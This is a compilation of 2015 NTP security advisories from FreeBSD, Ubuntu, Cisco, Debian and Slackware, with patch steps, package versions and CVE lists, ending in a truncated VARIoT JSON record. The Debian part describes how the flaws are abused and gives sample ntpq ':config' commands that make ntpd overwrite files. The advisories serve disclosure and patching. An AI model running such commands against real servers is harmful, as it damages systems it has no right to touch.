An attacker which can send NTP packets to ntpd(8), which uses cryptographic authentication of NTP data, may be able to inject malicious time data causing the system clock to be set incorrectly. [CVE-2015-7871]
An attacker which can send NTP packets to ntpd(8), can block the communication of the daemon with time servers, causing the system clock not being synchronized. [CVE-2015-7704]
An attacker which can send NTP packets to ntpd(8), can remotely crash the daemon, sending malicious data packet. [CVE-2015-7855] [CVE-2015-7854] [CVE-2015-7853] [CVE-2015-7852] [CVE-2015-7849] [CVE-2015-7848]
An attacker which can send NTP packets to ntpd(8), can remotely trigger the daemon to overwrite its configuration files. [CVE-2015-7851] [CVE-2015-5196]
IV. Workaround
No workaround is available, but systems not running ntpd(8) are not affected. Network administrators are advised to implement BCP-38, which helps to reduce risk associated with the attacks.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.
The ntpd service has to be restarted after the update. A reboot is recommended but not required.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
The ntpd service has to be restarted after the update. A reboot is recommended but not required.
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
[FreeBSD 10.2]
fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-102.patch.bz2
bunzip2 ntp-102.patch.bz2
fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-102.patch.asc
gpg --verify ntp-102.patch.asc
[FreeBSD 10.1]
fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-101.patch.bz2
bunzip2 ntp-101.patch.bz2
fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-101.patch.asc
gpg --verify ntp-101.patch.asc
[FreeBSD 9.3]
fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-93.patch.bz2
bunzip2 ntp-93.patch.bz2
fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-93.patch.asc
gpg --verify ntp-93.patch.asc
b) Apply the patch. Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
find contrib/ntp -type f -empty -delete
c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html.
d) For 9.3-RELEASE and 10.1-RELEASE an update to /etc/ntp.conf is recommended, which can be done with help of the mergemaster(8) tool on 9.3-RELEASE and with help of the etcupdate(8) tool on 10.1-RELEASE.
Restart the ntpd(8) daemon, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each affected branch.
Branch/path Revision
stable/9/ r289998 releng/9.3/ r290001 stable/10/ r289997 releng/10.1/ r290000 releng/10.2/ r289999
To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:
svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN
VII. References
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7703 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871
The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-15:25.ntp.asc -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIcBAEBAgAGBQJWLhOJAAoJEO1n7NZdz2rn91wP/2GwEt1boNQq2a7nYzv/mS5D sYKkIi7o+2yr2BLXvtc3O7c9QC3/YeGsza9DTRqndcY572SWvRgtkFstMTTm8IV/ RVlIE40gVR3tex0zo7BiD7uKUrxWxWcpwMbE5dzlE+vSybyyj0dSSkwUHJjrbJoA RmyNuEEUhQn5sRCg6qJv/PLp2G7BcYAasKScukjm7QnLP2kq/tvM9mcqwfh2tadM 7kbf8uq+ykvsRzctaDnxQaB5+zJxBQYJjBelxQfIkNek0XGfdj3sRwISeFznbllq mOLTIBaFiuEtHtusO7MKKavMgS5CQJOvuuvd/l3NY1MnxC6X/1SWig9KIKDIn/hv q8dsnq7LLx+tO6Cv4Dub7EbC2ZP3xXGOC4Ie02z8bTZnbX7iwyPUidQQqtU9ra15 rxzFcZnBxu+yyMNJVsV2qVV/r9OycgKxWlEELC1wYrK9fKfvLdA5aEGjDeU1Z+s6 JS2zKr0t4F2bMrCsjYP1lQD8sHkCVjwJk+IJU/slcwSajDjBNlMH0yBxGYE1ETIZ qMF7/PAkLe8V78pdYmXw9pcaPyhI+ihPLnNrdhX8AI2RX5jDK7IuUNJeUM04UrVB 8N+mMwgamcuCPWNNyXaL0bz21fexZOuhHmU+B8Yn3SFX5O5b/r9gGvrjo8ei8jOk EUlBT3ViDhHNrI7PTaiI =djPm -----END PGP SIGNATURE----- . ============================================================================ Ubuntu Security Notice USN-2783-1 October 27, 2015
ntp vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.10
- Ubuntu 15.04
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in NTP. (CVE-2015-5146)
Miroslav Lichvar discovered that NTP incorrectly handled logconfig directives. (CVE-2015-5194)
Miroslav Lichvar discovered that NTP incorrectly handled certain statistics types. (CVE-2015-5195)
Miroslav Lichvar discovered that NTP incorrectly handled certain file paths. (CVE-2015-5196, CVE-2015-7703)
Miroslav Lichvar discovered that NTP incorrectly handled certain packets. (CVE-2015-5219)
Aanchal Malhotra, Isaac E. Cohen, and Sharon Goldberg discovered that NTP incorrectly handled restarting after hitting a panic threshold. (CVE-2015-7691, CVE-2015-7692, CVE-2015-7702)
It was discovered that NTP incorrectly handled memory when processing certain autokey messages. (CVE-2015-7701)
Aanchal Malhotra, Isaac E. Cohen, and Sharon Goldberg discovered that NTP incorrectly handled rate limiting. (CVE-2015-7704, CVE-2015-7705)
Yves Younan discovered that NTP incorrectly handled logfile and keyfile directives. (CVE-2015-7850)
Yves Younan and Aleksander Nikolich discovered that NTP incorrectly handled ascii conversion. (CVE-2015-7852)
Yves Younan discovered that NTP incorrectly handled reference clock memory. A malicious refclock could possibly use this issue to cause NTP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2015-7853)
John D "Doug" Birdwell discovered that NTP incorrectly handled decoding certain bogus values. (CVE-2015-7855)
Stephen Gray discovered that NTP incorrectly handled symmetric association authentication. (CVE-2015-7871)
In the default installation, attackers would be isolated by the NTP AppArmor profile.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 15.10: ntp 1:4.2.6.p5+dfsg-3ubuntu8.1
Ubuntu 15.04: ntp 1:4.2.6.p5+dfsg-3ubuntu6.2
Ubuntu 14.04 LTS: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.5
Ubuntu 12.04 LTS: ntp 1:4.2.6.p3+dfsg-1ubuntu3.6
In general, a standard system update will make all the necessary changes.
References: http://www.ubuntu.com/usn/usn-2783-1 CVE-2015-5146, CVE-2015-5194, CVE-2015-5195, CVE-2015-5196, CVE-2015-5219, CVE-2015-5300, CVE-2015-7691, CVE-2015-7692, CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, CVE-2015-7704, CVE-2015-7705, CVE-2015-7850, CVE-2015-7852, CVE-2015-7853, CVE-2015-7855, CVE-2015-7871
Package Information: https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu8.1 https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu6.2 https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.5 https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.6 .
On October 21st, 2015, NTP.org released a security advisory detailing 13 issues regarding multiple DoS vulnerabilities, information disclosure vulnerabilities, and logic issues that may result in an attacker gaining the ability to modify an NTP server's advertised time.
Workarounds that mitigate one or more of the vulnerabilities may be available for certain products, please see the individual Cisco Bug IDs for details.
CVE-2015-5194
It was found that ntpd could crash due to an uninitialized
variable when processing malformed logconfig configuration
commands.
CVE-2015-5195
It was found that ntpd exits with a segmentation fault when a
statistics type that was not enabled during compilation (e.g.
timingstats) is referenced by the statistics or filegen
configuration command
CVE-2015-5219
It was discovered that sntp program would hang in an infinite loop
when a crafted NTP packet was received, related to the conversion
of the precision value in the packet to double.
CVE-2015-5300
It was found that ntpd did not correctly implement the -g option:
Normally, ntpd exits with a message to the system log if the offset
exceeds the panic threshold, which is 1000 s by default. This
option allows the time to be set to any value without restriction;
however, this can happen only once. If the threshold is exceeded
after that, ntpd will exit with a message to the system log. This
option can be used with the -q and -x options.
ntpd could actually step the clock multiple times by more than the
panic threshold if its clock discipline doesn't have enough time to
reach the sync state and stay there for at least one update. If a
man-in-the-middle attacker can control the NTP traffic since ntpd
was started (or maybe up to 15-30 minutes after that), they can
prevent the client from reaching the sync state and force it to step
its clock by any amount any number of times, which can be used by
attackers to expire certificates, etc.
This is contrary to what the documentation says. Normally, the
assumption is that an MITM attacker can step the clock more than the
panic threshold only once when ntpd starts and to make a larger
adjustment the attacker has to divide it into multiple smaller
steps, each taking 15 minutes, which is slow.
CVE-2015-7701
A memory leak flaw was found in ntpd's CRYPTO_ASSOC.
CVE-2015-7703
Miroslav Lichvar of Red Hat found that the :config command can be
used to set the pidfile and driftfile paths without any
restrictions. A remote attacker could use this flaw to overwrite a
file on the file system with a file containing the pid of the ntpd
process (immediately) or the current estimated drift of the system
clock (in hourly intervals). For example:
ntpq -c ':config pidfile /tmp/ntp.pid'
ntpq -c ':config driftfile /tmp/ntp.drift'
In Debian ntpd is configured to drop root privileges, which limits
the impact of this issue.
CVE-2015-7704
If ntpd as an NTP client receives a Kiss-of-Death (KoD) packet
from the server to reduce its polling rate, it doesn't check if the
originate timestamp in the reply matches the transmit timestamp from
its request. An off-path attacker can send a crafted KoD packet to
the client, which will increase the client's polling interval to a
large value and effectively disable synchronization with the server. A
specially crafted configuration file could cause an endless loop
resulting in a denial of service.
CVE-2015-7852
A potential off by one vulnerability exists in the cookedprint
functionality of ntpq. A specially crafted buffer could cause a
buffer overflow potentially resulting in null byte being written out
of bounds.
CVE-2015-7871
An error handling logic error exists within ntpd that manifests due
to improper error condition handling associated with certain
crypto-NAK packets. An unauthenticated, off-path attacker can force
ntpd processes on targeted servers to peer with time sources of the
attacker's choosing by transmitting symmetric active crypto-NAK
packets to ntpd.
For the oldstable distribution (wheezy), these problems have been fixed in version 1:4.2.6.p5+dfsg-2+deb7u6.
For the stable distribution (jessie), these problems have been fixed in version 1:4.2.6.p5+dfsg-7+deb8u1.
For the testing distribution (stretch), these problems have been fixed in version 1:4.2.8p4+dfsg-3.
For the unstable distribution (sid), these problems have been fixed in version 1:4.2.8p4+dfsg-3.
We recommend that you upgrade your ntp packages.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz: Upgraded. In addition to bug fixes and enhancements, this release fixes several low and medium severity vulnerabilities. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9750 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5196 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7691 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7692 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7705 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p4-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p4-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p4-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p4-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p4-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p4-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 21dd14178fea17a88c9326c8672ecefd ntp-4.2.8p4-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: 8647479b2007b92ff8598184f2275263 ntp-4.2.8p4-x86_64-1_slack13.0.txz
Slackware 13.1 package: e0f122e8e271dc84db06202c03cc0288 ntp-4.2.8p4-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: db0aff04b72b3d8c96ca8c8e1ed36c05 ntp-4.2.8p4-x86_64-1_slack13.1.txz
Slackware 13.37 package: 5914e43e886e5ff88fefd30083493e30 ntp-4.2.8p4-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: 4335c3bf2ae24afc5ad734e8d80b3e94 ntp-4.2.8p4-x86_64-1_slack13.37.txz
Slackware 14.0 package: 39b05698797b638b67130e0b170e0a4b ntp-4.2.8p4-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: dcf4a56ba1d013ee1c9d0e624e158709 ntp-4.2.8p4-x86_64-1_slack14.0.txz
Slackware 14.1 package: 1fd3a7beaf23303e2c211af377662614 ntp-4.2.8p4-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: 438c3185aa8ec20d1c2b5e51786e4d41 ntp-4.2.8p4-x86_64-1_slack14.1.txz
Slackware -current package: 81bfb2fed450cb26a51b5e1cee0d33ed n/ntp-4.2.8p4-i586-1.txz
Slackware x86_64 -current package: 8bae4ad633af40d4d54b7686e4b225f9 n/ntp-4.2.8p4-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg ntp-4.2.8p4-i486-1_slack14.1.txz
Then, restart the NTP daemon:
sh /etc/rc.d/rc.ntpd restart
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201708-0038", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "ntp", "scope": "eq", "trust": 1.3, "vendor": "ntp", "version": "4.2.8" }, { "model": "ntp", "scope": "gte", "trust": 1.0, "vendor": "ntp", "version": "4.3.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "ntp", "scope": "lt", "trust": 1.0, "vendor": "ntp", "version": "4.2.8" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "7.0" }, { "model": "oncommand balance", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "clustered data ontap", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "oncommand performance manager", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "oncommand unified manager", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "tim 4r-ie", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "*" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "9.0" }, { "model": "ntp", "scope": "lt", "trust": 1.0, "vendor": "ntp", "version": "4.3.77" }, { "model": "data ontap", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "ntp", "scope": "gte", "trust": 1.0, "vendor": "ntp", "version": "4.2.0" }, { "model": "tim 4r-ie dnp3", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "*" }, { "model": "ntp", "scope": "eq", "trust": 0.9, "vendor": "ntp", "version": "4.3.70" }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": null }, { "model": "ntp", "scope": "lt", "trust": 0.8, "vendor": "ntp", "version": "4.2.8p4 less than 4.2.x" }, { "model": "ntp", "scope": "lt", "trust": 0.8, "vendor": "ntp", "version": "4.3.77 less than 4.3.x" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.66" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.74" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.68" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.69" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.72" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.73" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.75" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.76" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.71" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "ruggedcom rox", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "2.6.3" }, { "model": "ruggedcom rox", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "2.6.2" }, { "model": "ruggedcom rox", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "2.0" }, { "model": "ruggedcom rox", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "1.16" }, { "model": "ruggedcom rox", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "1.14.5" }, { "model": "ruggedcom rox", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "1.0" }, { "model": "automation stratix", "scope": "eq", "trust": 0.3, "vendor": "rockwell", "version": "59000" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.25" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.6" }, { "model": "4.2.8p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p2", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p366", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p111", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p11", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.5p186", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "junos os", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "qlogic virtual fabric extension module for ibm bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "qlogic 8gb intelligent pass-thru module and san switch module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.10" }, { "model": "ib6131 gb infiniband switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "83.4" }, { "model": "ib6131 gb infiniband switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "83.2" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.00" }, { "model": "flex system en6131 40gb ethernet switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4" }, { "model": "flex system en6131 40gb ethernet switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "ds8800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "86.31.167.0" }, { "model": "ds8800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "ds8700", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87.51.14.x" }, { "model": "ds8700", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87.41.17.x" }, { "model": "ds8700", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "76.31.143.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.16" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.75" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.68" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.126" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.10" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.9" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.8" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, 